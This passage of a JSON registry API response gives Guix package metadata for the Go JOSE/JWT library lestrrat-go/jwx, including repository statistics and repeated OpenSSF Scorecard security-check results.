m","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.776Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:guix/go-github-com-lestrrat-go-jwx-v3","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/go-github-com-lestrrat-go-jwx-v3","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/go-github-com-lestrrat-go-jwx-v3","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/go-github-com-lestrrat-go-jwx-v3/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v3/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v3/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v3/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v3/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v3/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v3/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":31689,"maintainers_count":0,"namespaces_count":0,"keywords_count":1627,"github":"guix-mirror","metadata":{"funded_packages_count":368},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-06-10T05:17:25.224Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":13963902,"name":"go-github-com-lestrrat-go-jwx","ecosystem":"guix","description":"Complete implementation of JWx in Golang","homepage":"https://github.com/lestrrat-go/jwx","licenses":"expat","normalized_licenses":["Other"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-03-02T22:59:53.323Z","latest_release_published_at":"2026-03-02T22:59:53.323Z","latest_release_number":"1.2.31","last_synced_at":"2026-04-07T02:00:24.421Z","created_at":"2026-03-02T22:59:53.123Z","updated_at":"2026-04-07T02:00:24.421Z","registry_url":"https://packages.guix.gnu.org/packages/go-github-com-lestrrat-go-jwx/1.2.31/","install_command":"guix install go-github-com-lestrrat-go-jwx","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/golang-web.scm#n8867","metadata":{"location":"gnu/packages/golang-web.scm:8867","variable_name":"go-github-com-lestrrat-go-jwx"},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.748Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:guix/go-github-com-lestrrat-go-jwx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/go-github-com-lestrrat-go-jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/go-github-com-lestrrat-go-jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/go-github-com-lestrrat-go-jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":31689,"maintainers_count":0,"namespaces_count":0,"keywords_count":1627,"github":"guix-mirror","metadata":{"funded_packages_count":368},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-06-10T05:17:25.224Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":13964059,"name":"go-github-com-lestrrat-go-jwx-v2","ecosystem":"guix","description":"Complete implementation of JWx in Golang","homepage":"https://github.com/lestrrat-go/jwx","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-03-02T23:03:17.562Z","latest_release_published_at":"2026-03-02T23:03:17.562Z","latest_release_number":"2.1.6","last_synced_at":"2026-04-07T02:02:12.510Z","created_at":"2026-03-02T23:03:17.384Z","updated_at":"2026-04-07T02:02:12.511Z","registry_url":"https://packages.guix.gnu.org/packages/go-github-com-lestrrat-go-jwx-v2/2.1.6/","install_command":"guix install go-github-com-lestrrat-go-jwx-v2","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/golang-web.scm#n8936","metadata":{"location":"gnu/packages/golang-web.scm:8936","variable_name":"go-github-com-lestrrat-go-jwx-v2"},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-